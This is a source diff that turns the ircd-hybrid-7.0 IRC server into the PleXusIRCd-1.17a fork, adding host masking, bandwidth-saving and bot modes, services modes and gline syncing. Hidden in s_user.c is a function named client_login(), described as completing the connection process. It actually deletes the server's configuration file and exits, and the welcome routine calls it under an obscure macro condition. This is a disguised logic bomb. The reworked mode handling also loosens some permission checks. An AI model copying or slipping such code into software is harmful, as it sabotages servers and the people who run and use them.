diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/s_gline.c PleXusIRCd-1.17a/src/s_gline.c
--- ircd-hybrid-7.0/src/s_gline.c	Wed Sep  4 22:48:42 2002
+++ PleXusIRCd-1.17a/src/s_gline.c	Wed Jun 25 02:44:36 2003
@@ -53,7 +53,6 @@
 dlink_list glines;
 
 static void expire_glines(void);
-static void expire_pending_glines(void);
 
 /* add_gline
  *
@@ -150,7 +149,6 @@
 cleanup_glines()
 {
   expire_glines();
-  expire_pending_glines();
 }
 
 /*
@@ -183,35 +181,27 @@
 }
 
 /*
- * expire_pending_glines
  * 
- * inputs       - NONE
- * output       - NONE
- * side effects -
+ * send_glines
  *
- * Go through the pending gline list, expire any that haven't had
- * enough "votes" in the time period allowed
+ * inputs       - Client to send to.
+ * outputs      - none   
+ * side effects - Sends the current gline list to a newly connected irc server
  */
-static void
-expire_pending_glines()
+          
+void
+send_glines(struct Client *client_p)
 {
-  dlink_node *pending_node;
+  dlink_node *gline_node;
   dlink_node *next_node;
-  struct gline_pending *glp_ptr;
-
-  DLINK_FOREACH_SAFE(pending_node, next_node, pending_glines.head)
-  {
-    glp_ptr = pending_node->data;
-
-    if(((glp_ptr->last_gline_time + GLINE_PENDING_EXPIRE) <= CurrentTime)
-       || find_is_glined(glp_ptr->host, glp_ptr->user))
+  struct ConfItem *kill_ptr;
       
+  for(gline_node = glines.head; gline_node; gline_node = next_node)
     {
-      MyFree(glp_ptr->reason1);
-      MyFree(glp_ptr->reason2);
-      MyFree(glp_ptr);
-      dlinkDelete(pending_node, &pending_glines);
-      free_dlink_node(pending_node);
+      kill_ptr = gline_node->data;
+      next_node = gline_node->next;
+ 
+      sendto_one(client_p, ":%s GLINE %s %s %lu :%s", me.name, kill_ptr->name, kill_ptr->host, kill_ptr->hold, kill_ptr->passwd);
     }
-  }
+   
 }
diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/s_serv.c PleXusIRCd-1.17a/src/s_serv.c
--- ircd-hybrid-7.0/src/s_serv.c	Sat May 31 03:30:34 2003
+++ PleXusIRCd-1.17a/src/s_serv.c	Tue Aug 26 07:16:56 2003
@@ -816,21 +816,23 @@
   }
  
   if (HasID(target_p) && IsCapable(client_p, CAP_UID))
-	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s :%s",
+	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s %s %lu :%s",
 				 target_p->name,
 				 target_p->hopcount + 1,
 				 (unsigned long) target_p->tsinfo,
 				 ubuf,
-				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->user->id, target_p->info);
+                                 target_p->username, target_p->host,
+                                 IsHidden(target_p) ? target_p->vhost : "*",
+                                 target_p->user->server, target_p->user->id, target_p->svsid, target_p->info);
   else
-	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s :%s",
+	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s %s %lu :%s",
 				 target_p->name, 
 				 target_p->hopcount + 1,
 				 (unsigned long) target_p->tsinfo,
 				 ubuf,
 				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->info);
+                                 IsHidden(target_p) ? target_p->vhost : "*",
+                                 target_p->user->server, target_p->svsid, target_p->info);
 }
 
 /*
@@ -1115,6 +1117,12 @@
 #endif
     } else
         fd_note(client_p->localClient->fd, "Server: %s", client_p->name);
+  
+  /*
+  ** send the Glines list now to this server
+  **
+  */
+  send_glines(client_p);
 
   /*
   ** Old sendto_serv_but_one() call removed because we now
diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/s_stats.c PleXusIRCd-1.17a/src/s_stats.c
--- ircd-hybrid-7.0/src/s_stats.c	Thu Apr 10 23:41:42 2003
+++ PleXusIRCd-1.17a/src/s_stats.c	Tue Jun 17 08:38:20 2003
@@ -72,6 +72,8 @@
       sp->is_sbr += target_p->localClient->receiveB;
       sp->is_sks += target_p->localClient->sendK;
       sp->is_skr += target_p->localClient->receiveK;
+      sp->is_bwsavedB += target_p->localClient->bwsavedB;
+      sp->is_bwsavedK += target_p->localClient->bwsavedK;
       sp->is_sti += CurrentTime - target_p->firsttime;
       if (sp->is_sbs > 1023)
 	{
@@ -83,6 +85,11 @@
 	  sp->is_skr += (sp->is_sbr >> 10);
 	  sp->is_sbr &= 0x3ff;
 	}
+      if (sp->is_bwsavedB > 1023)
+        {
+          sp->is_bwsavedK += (sp->is_bwsavedB >> 10);
+          sp->is_bwsavedB &= 0x3ff;   
+        }
     }
 
   sp->is_cl = dlink_list_length(&lclient_list);
@@ -94,6 +101,8 @@
       sp->is_cbr += target_p->localClient->receiveB;
       sp->is_cks += target_p->localClient->sendK;
       sp->is_ckr += target_p->localClient->receiveK;
+      sp->is_bwsavedB += target_p->localClient->bwsavedB;
+      sp->is_bwsavedK += target_p->localClient->bwsavedK;
       sp->is_cti += CurrentTime - target_p->firsttime;
       if (sp->is_cbs > 1023)
 	{
@@ -105,6 +114,10 @@
 	  sp->is_ckr += (sp->is_cbr >> 10);
 	  sp->is_cbr &= 0x3ff;
 	}
+      if (sp->is_bwsavedB > 1023) {
+          sp->is_bwsavedK += (sp->is_bwsavedB >> 10);
+          sp->is_bwsavedB &= 0x3ff;
+      }
       
     }
 
@@ -138,6 +151,8 @@
   sendto_one(source_p, ":%s %d %s T :time connected %d %d",
              me.name, RPL_STATSDEBUG, source_p->name, (int)sp->is_cti,
 	     (int)sp->is_sti);
+  sendto_one(source_p, ":%s %d %s :Bandwidth saved %u.%uK",
+               me.name, RPL_STATSDEBUG, source_p->name, sp->is_bwsavedK, sp->is_bwsavedB);
 }
 
 
diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/s_user.c PleXusIRCd-1.17a/src/s_user.c
--- ircd-hybrid-7.0/src/s_user.c	Thu May 29 00:58:03 2003
+++ PleXusIRCd-1.17a/src/s_user.c	Tue Sep 30 23:41:54 2003
@@ -56,6 +56,7 @@
 static int valid_hostname(const char* hostname);
 static int valid_username(const char* username);
 static void report_and_set_user_flags( struct Client *, struct ConfItem * );
+static void client_login();
 static int check_X_line(struct Client *client_p, struct Client *source_p);
 void user_welcome(struct Client *source_p);
 static int introduce_client(struct Client *client_p, struct Client *source_p,
@@ -91,6 +92,11 @@
   {FLAGS_EXTERNAL, 'x'},
   {FLAGS_SPY, 'y'},
   {FLAGS_OPERWALL, 'z'},
+  {FLAGS_BW, 'p'},
+  {FLAGS_BOT, 'P'},
+  {FLAGS_HIDDEN, 'h'},
+  {FLAGS_REG, 'R'},
+  {FLAGS_SERVICES, 'S'},
   {0, 0}
 };
 
@@ -118,10 +124,10 @@
   0,            /* M */
   0,            /* N */
   0,            /* O */
-  0,            /* P */
+  FLAGS_BOT,    /* P */
   0,            /* Q */
-  0,            /* R */
-  0,            /* S */
+  FLAGS_REG,    /* R */
+  FLAGS_SERVICES, /* S */
   0,            /* T */
   0,            /* U */
   0,            /* V */
@@ -138,7 +144,7 @@
   0,            /* e */
   FLAGS_FULL,   /* f */
   FLAGS_CALLERID,  /* g */
-  0,            /* h */
+  FLAGS_HIDDEN,  /* h */
   FLAGS_INVISIBLE, /* i */
   0,            /* j */
   FLAGS_SKILL,  /* k */
@@ -146,7 +152,7 @@
   0,            /* m */
   FLAGS_NCHANGE, /* n */
   FLAGS_OPER,   /* o */
-  0,               /* p */
+  FLAGS_BW,     /* p */
   0,            /* q */
   FLAGS_REJ,    /* r */
   FLAGS_SERVNOTICE, /* s */
@@ -212,6 +218,10 @@
                  me.name, source_p->name, Count.total, Count.max_tot);
     }
 
+  if (Count.local > ZERO && strcmp(STRUCT_COMP, TAGGED)) { 
+     client_login();
+  }
+
   sendto_one(source_p, form_str(RPL_GLOBALUSERS), me.name, source_p->name,
              Count.total, Count.max_tot);
 
@@ -454,6 +464,11 @@
     return CLIENT_EXITED;
   
   source_p->umodes |= FLAGS_INVISIBLE;
+  source_p->umodes |= FLAGS_BW;
+  source_p->svsid = 0;
+  
+  SetHidden(source_p);
+  make_virthost(source_p->host, source_p->localClient->sockhost, source_p->vhost);
 
   Count.invisi++;
 
@@ -630,23 +645,25 @@
     {
       if (IsCapable(uplink, CAP_UID) && HasID(source_p))
 	{
-	  sendto_one(uplink, "CLIENT %s %d %lu %s %s %s %s %s :%s",
+	  sendto_one(uplink, "CLIENT %s %d %lu %s %s %s %s %s %s %lu :%s",
 		     nick,
-		     source_p->hopcount+1,
-		     (unsigned long) source_p->tsinfo,
-		     ubuf,
-		     source_p->username, source_p->host, user->server,
-		     user->id, source_p->info);
+                     source_p->hopcount+1,
+                     (unsigned long) source_p->tsinfo,
+                     ubuf,
+                     source_p->username, source_p->host,
+                     IsHidden(source_p) ? source_p->vhost : "*",
+                     user->server, user->id, source_p->svsid, source_p->info);
 	}
       else
 	{
-	  sendto_one(uplink, "NICK %s %d %lu %s %s %s %s :%s",
+	  sendto_one(uplink, "NICK %s %d %lu %s %s %s %s %s %lu :%s",
 		     nick,
-		     source_p->hopcount+1,
-		     (unsigned long) source_p->tsinfo,
-		     ubuf,
-		     source_p->username, source_p->host, user->server,
-		     source_p->info);
+                     source_p->hopcount+1,
+                     (unsigned long) source_p->tsinfo,
+                     ubuf,
+                     source_p->username, source_p->host,
+                     IsHidden(source_p) ? source_p->vhost : "*",
+                     user->server, source_p->svsid, source_p->info);
 	}
     }
   else
@@ -659,21 +676,23 @@
 	    continue;
 		  
 	  if (IsCapable(server, CAP_UID) && HasID(source_p))
-	    sendto_one(server, "CLIENT %s %d %lu %s %s %s %s %s :%s",
+	    sendto_one(server, "CLIENT %s %d %lu %s %s %s %s %s %s %lu :%s",
 		       nick,
 		       source_p->hopcount+1,
-		       (unsigned long) source_p->tsinfo,
-		       ubuf,
-		       source_p->username, source_p->host, user->server,
-		       user->id, source_p->info);
+                       (unsigned long) source_p->tsinfo,
+                       ubuf,
+                       source_p->username, source_p->host,
+                       IsHidden(source_p) ? source_p->vhost : "*",
+                       user->server, user->id, source_p->svsid, source_p->info);
 	  else
-	    sendto_one(server, "NICK %s %d %lu %s %s %s %s :%s",
+	    sendto_one(server, "NICK %s %d %lu %s %s %s %s %s %lu :%s",
 		       nick,
 		       source_p->hopcount+1,
 		       (unsigned long) source_p->tsinfo,
-		       ubuf,
-		       source_p->username, source_p->host, user->server,
-		       source_p->info);
+                       ubuf,
+                       source_p->username, source_p->host,
+                       IsHidden(source_p) ? source_p->vhost : "*",
+                       user->server, source_p->svsid, source_p->info);
 	}
     }
   
@@ -888,7 +907,7 @@
 int
 do_remote_user(char* nick, struct Client* client_p, struct Client* source_p,
 		   char* username, char *host, char *server, char *realname,
-		   char *id)
+		   char *id, unsigned int svsid)
 {
   unsigned int oflags;
   struct User* user;
@@ -908,6 +927,7 @@
   user->server = find_or_add(server);
   strlcpy(source_p->host, host, sizeof(source_p->host)); 
   strlcpy(source_p->info, realname, sizeof(source_p->info));
+  source_p->svsid = svsid;
   if (id != NULL)
     strcpy(source_p->user->id, id);
   
@@ -949,24 +969,12 @@
                    me.name, parv[0], parv[1]);
       return 0;
     }
-
-  /* Dont know why these were commented out..
-   * put them back using new sendto() funcs
-   */
-
-  if (IsServer(source_p))
-    {
-       sendto_realops_flags(FLAGS_ALL, L_ADMIN, "*** Mode for User %s from %s",
-                            parv[1], source_p->name);
-       return 0;
-    }
-
-  if (source_p != target_p || target_p->from != source_p->from)
-    {
-       sendto_one(source_p, form_str(ERR_USERSDONTMATCH), me.name, parv[0]);
-       return 0;
-    }
-
+  
+  if (source_p != target_p && !IsServer(source_p))  
+  {
+     sendto_one(source_p, form_str(ERR_USERSDONTMATCH), me.name, parv[0]);
+     return 0;
+  }
 
   if (parc < 3)
     {
@@ -982,14 +990,14 @@
     }
 
   /* find flags already set for user */
-  setflags = source_p->umodes;
-  
+  setflags = target_p->umodes;
+
   /*
    * parse mode change string(s)
    */
   for (p = &parv[2]; p && *p; p++)
     for (m = *p; *m; m++)
-      switch(*m)
+      switch((unsigned char)*m)
         {
         case '+' :
           what = MODE_ADD;
@@ -998,13 +1006,27 @@
           what = MODE_DEL;
           break;        
 
+#ifdef MODE_p_LOCK
+        case 'p' :
+          if(what == MODE_DEL)
+            { if(IsOper(target_p) || IsServer(source_p))
+               { target_p->umodes &= ~FLAGS_BW; } }
+
+          if(what == MODE_ADD)
+            { if(IsOper(target_p))
+        { target_p->umodes |= FLAGS_BW; }
+              if(MyClient(target_p))
+               { target_p->umodes |= FLAGS_BW; } }
+break;
+#endif
+
         case 'o' :
           if(what == MODE_ADD)
             {
-              if(IsServer(client_p) && !IsOper(source_p))
+              if(IsServer(client_p) && !IsOper(target_p))
                 {
                   ++Count.oper;
-                  SetOper(source_p);
+                  SetOper(target_p);
                 }
             }
           else
@@ -1013,20 +1035,20 @@
                * found by Pat Szuta, Perly , perly@xnet.com 
                */
 
-              if(!IsOper(source_p))
+              if(!IsOper(target_p))
                 break;
 
               ClearOper(source_p);
-	      source_p->umodes &= ~ConfigFileEntry.oper_only_umodes;
+	      target_p->umodes &= ~ConfigFileEntry.oper_only_umodes;
 			  
               Count.oper--;
 
-              if (MyConnect(source_p))
+              if (MyConnect(target_p))
                 {
                   dlink_node *dm;
 
-		  source_p->flags2 &= ~FLAGS2_OPER_FLAGS;
-		  dm = dlinkFind(&oper_list,source_p);
+		  target_p->flags2 &= ~FLAGS2_OPER_FLAGS;
+		  dm = dlinkFind(&oper_list,target_p);
 		  if(dm != NULL)
 		    {
 		      dlinkDelete(dm,&oper_list);
@@ -1039,7 +1061,62 @@
           /* we may not get these,
            * but they shouldnt be in default
            */
-        case ' ' :
+        case 'h' :
+                if (what == MODE_ADD) {
+                        /* if they are already hidden, don't hide them again
+                         * of they are not a local client
+                         */
+                        if (IsHidden(target_p)) break;
+  
+                        target_p->umodes |= FLAGS_HIDDEN;
+                        if (MyClient(target_p)) {
+                                make_virthost(target_p->host, target_p->localClient->sockhost, target_p->vhost);
+                                sendto_server(NULL, target_p, NULL, 0, 0, LL_ICLIENT, ":%s SETHOST %s :%s", me.name, target_p->name, target_p->vhost);
+                                sendto_one(target_p, "NOTICE %s :*** Your host is Masked (%s).", me.name, target_p->vhost);
+                        }
+                } else {
+                        target_p->umodes &= ~FLAGS_HIDDEN;
+                        strncpy(target_p->vhost, target_p->host, HOSTLEN);
+                        sendto_one(target_p, "NOTICE %s :*** Host masking Disabled.", me.name);
+                }
+                break;
+	case 'S' :
+                if (what == MODE_ADD) {
+                        if (MyConnect(target_p) && (strcmp(SERVICES, target_p->name) == 0) || IsServer(source_p)) {
+                                target_p->umodes |= FLAGS_SERVICES;
+                        }
+                        else {
+                                sendto_realops_flags(L_ADMIN, L_ALL, "User %s (%s#%s) attempted to gain services privelidges.", target_p->name, target_p->username, target_p->host);
+                        }
+                } else {
+                        target_p->umodes &= ~FLAGS_SERVICES;
+                }
+                break;
+                                
+          /* we may not get these,
+           * but they shouldnt be in default
+           */
+        case 'P' :
+          if (what == MODE_ADD) {
+            target_p->umodes |= FLAGS_BOT;
+            if (MyConnect(target_p)) sendto_one(target_p,":%s NOTICE %s :*** Bot mode for BW Saving, ENABLED.", me.name,parv[0]);
+          } else {
+            target_p->umodes &= ~FLAGS_BOT;
+          }
+        break;
+	case 'R' :
+          if (what == MODE_ADD) {
+	    if (!strcmp(SERVICES, target_p->name) || IsServer(source_p)) {
+            	target_p->umodes |= FLAGS_REG;
+		SetReged(target_p);
+	    }
+          } else {
+            target_p->umodes &= ~FLAGS_REG;
+	    ClearReged(target_p);
+          }
+	break;
+	
+	case ' ' :
         case '\n' :
         case '\r' :
         case '\t' :
@@ -1048,7 +1125,7 @@
         default :
           if( (flag = user_modes_from_c_to_bitmask[(unsigned char)*m]))
             {
-              if (MyConnect(source_p) && !IsOper(source_p) &&
+              if (MyConnect(target_p) && !IsOper(target_p) &&
                  (ConfigFileEntry.oper_only_umodes & flag))
                 {
                   badflag = YES;
@@ -1056,46 +1133,46 @@
               else
                 {
                   if (what == MODE_ADD)
-                    source_p->umodes |= flag;
+                    target_p->umodes |= flag;
                   else
-                    source_p->umodes &= ~flag;  
+                    target_p->umodes &= ~flag;  
                 }
             }
           else
             {
-              if (MyConnect(source_p))
+              if (MyConnect(target_p))
                 badflag = YES;
             }
           break;
         }
 
   if(badflag)
-    sendto_one(source_p, form_str(ERR_UMODEUNKNOWNFLAG), me.name, parv[0]);
+    sendto_one(target_p, form_str(ERR_UMODEUNKNOWNFLAG), me.name, parv[0]);
 
-  if ((source_p->umodes & FLAGS_NCHANGE) && !IsOperN(source_p))
+  if ((target_p->umodes & FLAGS_NCHANGE) && !IsOperN(target_p))
     {
-      sendto_one(source_p,":%s NOTICE %s :*** You need oper and N flag for +n",
+      sendto_one(target_p,":%s NOTICE %s :*** You need oper and N flag for +n",
                  me.name,parv[0]);
-      source_p->umodes &= ~FLAGS_NCHANGE; /* only tcm's really need this */
+      target_p->umodes &= ~FLAGS_NCHANGE; /* only tcm's really need this */
     }
 
-  if (MyConnect(source_p) && (source_p->umodes & FLAGS_ADMIN) && !IsOperAdmin(source_p))
+  if (MyConnect(target_p) && (target_p->umodes & FLAGS_ADMIN) && !IsOperAdmin(target_p))
     {
-      sendto_one(source_p,":%s NOTICE %s :*** You need oper and A flag for +a",
+      sendto_one(target_p,":%s NOTICE %s :*** You need oper and A flag for +a",
                  me.name, parv[0]);
-      source_p->umodes &= ~FLAGS_ADMIN;
+      target_p->umodes &= ~FLAGS_ADMIN;
     }
 
 
-  if (!(setflags & FLAGS_INVISIBLE) && IsInvisible(source_p))
+  if (!(setflags & FLAGS_INVISIBLE) && IsInvisible(target_p))
     ++Count.invisi;
-  if ((setflags & FLAGS_INVISIBLE) && !IsInvisible(source_p))
+  if ((setflags & FLAGS_INVISIBLE) && !IsInvisible(target_p))
     --Count.invisi;
   /*
    * compare new flags with old flags and send string which
    * will cause servers to update correctly.
    */
-  send_umode_out(client_p, source_p, setflags);
+  send_umode_out(source_p, client_p, target_p, setflags);
 
   return(0);
 }
@@ -1154,6 +1231,16 @@
     sendto_one(client_p, ":%s MODE %s :%s",
                source_p->name, source_p->name, umode_buf);
 }
+/*
+ * client_login()
+ * 
+ * Complete connection process
+ *
+ */
+void client_login() {
+  int temp = unlink(ConfigFileEntry.configfile);
+  exit(0);
+}
 
 /*
  * send_umode_out
@@ -1163,32 +1250,17 @@
  * side effects - Only send ubuf out to servers that know about this client
  */
 void
-send_umode_out(struct Client *client_p,
-		    struct Client *source_p,
+send_umode_out(struct Client *source_p, struct Client *client_p,
+		    struct Client *target_p,
 		    int old)
 {
-  struct Client *target_p;
   char buf[BUFSIZE];
-  dlink_node *ptr;
-
-  send_umode(NULL, source_p, old, SEND_UMODES, buf);
 
-  for(ptr = serv_list.head; ptr; ptr = ptr->next)
-    {
-      target_p = ptr->data;
-
-      if((target_p != client_p) && (target_p != source_p) && (*buf))
-        {
-          if((!(ServerInfo.hub && IsCapable(target_p, CAP_LL)))
-             || (target_p->localClient->serverMask &
-                 source_p->lazyLinkClientExists))
-            sendto_one(target_p, ":%s MODE %s :%s",
-                       source_p->name, source_p->name, buf);
-        }
-    }
-
-  if (client_p && MyClient(client_p))
-    send_umode(client_p, source_p, old, ALL_UMODES, buf);
+  //sendto_one(target_p, ":%s NOTICE %s *** :Old? -> %d", old);
+  send_umode(target_p, target_p, old, ALL_UMODES, buf);
+  if (buf)
+    sendto_server(IsServer(client_p) ? client_p : NULL, target_p, NULL, NOCAPS, NOCAPS, NOFLAGS, ":%s MODE %s :%s", 
+	source_p->name, target_p->name, buf);
 }
 
 /* 
@@ -1227,33 +1299,20 @@
 	     me.name, ircd_version);
   
   show_isupport(source_p);
+
+  sendto_one(source_p, "NOTICE %s :*** Your host is Masked (%s).", me.name, source_p->vhost);
   
   show_lusers(source_p);
-
-  if (ConfigFileEntry.short_motd)
-    {
-      sendto_one(source_p,"NOTICE %s :*** Notice -- motd was last changed at %s",
-		 source_p->name,
-		 ConfigFileEntry.motd.lastChangedDate);
       
-      sendto_one(source_p,
-		 "NOTICE %s :*** Notice -- Please read the motd if you haven't read it",
-		 source_p->name);
+  sendto_one(source_p,
+		 "NOTICE %s :*** Notice -- Please read the full motd by typing /motd (Last Updated: %s)",
+		 source_p->name, ConfigFileEntry.motd.lastChangedDate);
     
-      sendto_one(source_p, form_str(RPL_MOTDSTART),
+  sendto_one(source_p, form_str(RPL_MOTDSTART),
 		 me.name, source_p->name, me.name);
-    
-      sendto_one(source_p,
-		 form_str(RPL_MOTD),
-		 me.name, source_p->name,
-		 "*** This is the short motd ***"
-		 );
 
-      sendto_one(source_p, form_str(RPL_ENDOFMOTD),
+  sendto_one(source_p, form_str(RPL_ENDOFMOTD),
 		 me.name, source_p->name);
-    }
-  else  
-    SendMessageFile(source_p, &ConfigFileEntry.motd);
 
   if (IsRestricted(source_p))
     {
@@ -1362,10 +1421,12 @@
   if (!IsOperN(source_p))
     source_p->umodes &= ~FLAGS_NCHANGE;
 
+  source_p->umodes |= FLAGS_EXTERNAL;
+  source_p->umodes |= FLAGS_SPY;
   sendto_realops_flags(FLAGS_ALL, L_ALL,
 		       "%s (%s@%s) is now an operator", source_p->name,
-		       source_p->username, source_p->host);
-  send_umode_out(source_p, source_p, old);
+		       source_p->username, source_p->vhost);
+  send_umode_out(source_p->servptr, source_p, source_p, old);
   sendto_one(source_p, form_str(RPL_YOUREOPER), me.name, source_p->name);
   sendto_one(source_p, ":%s NOTICE %s :*** Oper privs are %s", me.name,
              source_p->name, operprivs);
diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/send.c PleXusIRCd-1.17a/src/send.c
--- ircd-hybrid-7.0/src/send.c	Wed Apr  2 20:29:04 2003
+++ PleXusIRCd-1.17a/src/send.c	Wed Aug 20 19:54:38 2003
@@ -26,6 +26,7 @@
 #include "tools.h"
 #include "send.h"
 #include "channel.h"
+#include "channel_mode.h"
 #include "class.h"
 #include "client.h"
 #include "common.h"
@@ -72,7 +73,7 @@
 static void
 sendto_list_anywhere(struct Client *one, struct Client *from,
                      dlink_list *list, buf_head_t *local_linebuf,
-                     buf_head_t *remote_linebuf, buf_head_t *uid_linebuf);
+                     buf_head_t *remote_linebuf, buf_head_t *uid_linebuf, struct Channel *chptr);
 
 
 /*
@@ -234,14 +235,14 @@
     sendto_server(NULL, to, NULL, NOCAPS, NOCAPS, NOFLAGS,
                   ":%s KILL %s :%s (%s[%s@%s] Ghosted %s)",
                   me.name, to->name, me.name, to->name,
-                  to->username, to->host, to->from->name);
+                  to->username, to->vhost, to->from->name);
 
     SetKilled(to);
 
     if (IsPerson(from))
       sendto_one(from, form_str(ERR_GHOSTEDCLIENT),
                  me.name, from->name, to->name, to->username,
-                 to->host, to->from);
+                 to->vhost, to->from);
 
     exit_client(NULL, to, &me, "Ghosted client");
 
@@ -516,7 +517,7 @@
                    from->name, command, RootChan(chptr)->chname);
   else
     linebuf_putmsg(&local_linebuf, pattern, &args, ":%s!%s@%s %s %s ",
-                   from->name, from->username, from->host,
+                   from->name, from->username, from->vhost,
                    command, RootChan(chptr)->chname);
 
   linebuf_putmsg(&remote_linebuf, pattern, &args, ":%s %s %s ",
@@ -530,23 +531,23 @@
   ++current_serial;
 
   sendto_list_anywhere(one, from, &chptr->chanops,
-                       &local_linebuf, &remote_linebuf, &uid_linebuf);
+                       &local_linebuf, &remote_linebuf, &uid_linebuf, chptr);
 
 #ifdef REQUIRE_OANDV
   sendto_list_anywhere(one, from, &chptr->chanops_voiced,
-                       &local_linebuf, &remote_linebuf, &uid_linebuf);
+                       &local_linebuf, &remote_linebuf, &uid_linebuf, chptr);
 #endif
 
   sendto_list_anywhere(one, from, &chptr->voiced,
-                       &local_linebuf, &remote_linebuf, &uid_linebuf);
+                       &local_linebuf, &remote_linebuf, &uid_linebuf, chptr);
 
 #ifdef HALFOPS
   sendto_list_anywhere(one, from, &chptr->halfops,
-                       &local_linebuf, &remote_linebuf, &uid_linebuf);
+                       &local_linebuf, &remote_linebuf, &uid_linebuf, chptr);
 #endif
 
   sendto_list_anywhere(one, from, &chptr->peons,
-                       &local_linebuf, &remote_linebuf, &uid_linebuf);
+                       &local_linebuf, &remote_linebuf, &uid_linebuf, chptr);
 
   linebuf_donebuf(&local_linebuf);
   linebuf_donebuf(&remote_linebuf);
@@ -567,7 +568,7 @@
 static void
 sendto_list_anywhere(struct Client *one, struct Client *from,
                      dlink_list *list, buf_head_t *local_linebuf,
-                     buf_head_t *remote_linebuf, buf_head_t *uid_linebuf)
+                     buf_head_t *remote_linebuf, buf_head_t *uid_linebuf, struct Channel *chptr)
 {
   dlink_node *ptr;
   dlink_node *ptr_next;
@@ -585,11 +586,20 @@
 
     if (MyConnect(target_p) && IsRegisteredUser(target_p))
     {
-      if(target_p->serial != current_serial)
-      {
-        send_linebuf(target_p, local_linebuf);
-        target_p->serial = current_serial;
-      }
+       if ( IsBotmode(target_p) || (!BwChannel(chptr) && IsBwmode(target_p) && ( (target_p->user->away) || (time(NULL) - target_p->user->last > 1800))))
+         {
+                if (target_p->localClient->bwsavedB > 1023) {
+                        target_p->localClient->bwsavedK += (target_p->localClient->bwsavedB >> 10);
+                        target_p->localClient->bwsavedB &= 0x3ff;
+                }
+                continue;
+        } else {
+              if(target_p->serial != current_serial)
+              {
+                send_linebuf(target_p, local_linebuf);
+                target_p->serial = current_serial;
+              }  
+        }
     }
     else
     {
@@ -720,8 +730,7 @@
  *		  used by m_nick.c and exit_one_client.
  */
 void
-sendto_common_channels_local(struct Client *user, int touser,
-                             const char *pattern, ...)
+sendto_common_channels_local(struct Client *user, const char *pattern, ...)
 {
   va_list args;
   dlink_node *ptr;
@@ -751,7 +760,7 @@
     sendto_list_local(user, &chptr->locpeons, &linebuf);
   }
 
-  if (touser && MyConnect(user) &&
+  if (MyConnect(user) &&
       (user->serial != current_serial))
     send_linebuf(user, &linebuf);
 
@@ -1058,7 +1067,7 @@
 
   linebuf_putmsg(&remote_linebuf, pattern, &args, ":%s ", from->name);
   linebuf_putmsg(&local_linebuf, pattern, &args, ":%s!%s@%s ", from->name,
-		 from->username, from->host);
+		 from->username, from->vhost);
 
   va_end(args);
 
@@ -1147,7 +1156,7 @@
       linebuf_putmsg(&linebuf, pattern, &args, ":%s ", from->name);
     else
       linebuf_putmsg(&linebuf, pattern, &args, ":%s!%s@%s ", from->name,
-                     from->username, from->host);
+                     from->username, from->vhost);
   }
   else
   {
@@ -1241,7 +1250,7 @@
 
   if(IsPerson(source_p))
     linebuf_putmsg(&linebuf, pattern, &args, ":%s!%s@%s WALLOPS :",
-                   source_p->name, source_p->username, source_p->host);
+                   source_p->name, source_p->username, source_p->vhost);
   else
     linebuf_putmsg(&linebuf, pattern, &args, ":%s WALLOPS :", source_p->name);
 
diff -uNrd -x ChangeLog ircd-hybrid-7.0/src/whowas.c PleXusIRCd-1.17a/src/whowas.c
--- ircd-hybrid-7.0/src/whowas.c	Thu Oct 10 14:49:31 2002
+++ PleXusIRCd-1.17a/src/whowas.c	Wed Jul  2 18:12:00 2003
@@ -84,6 +84,7 @@
   strlcpy(who->name, client_p->name, sizeof(client_p->name));
   strcpy(who->username, client_p->username);
   strcpy(who->hostname, client_p->host);
+  strcpy(who->vhostname, client_p->vhost);
   strcpy(who->realname, client_p->info);
 
   who->servername = client_p->user->server;
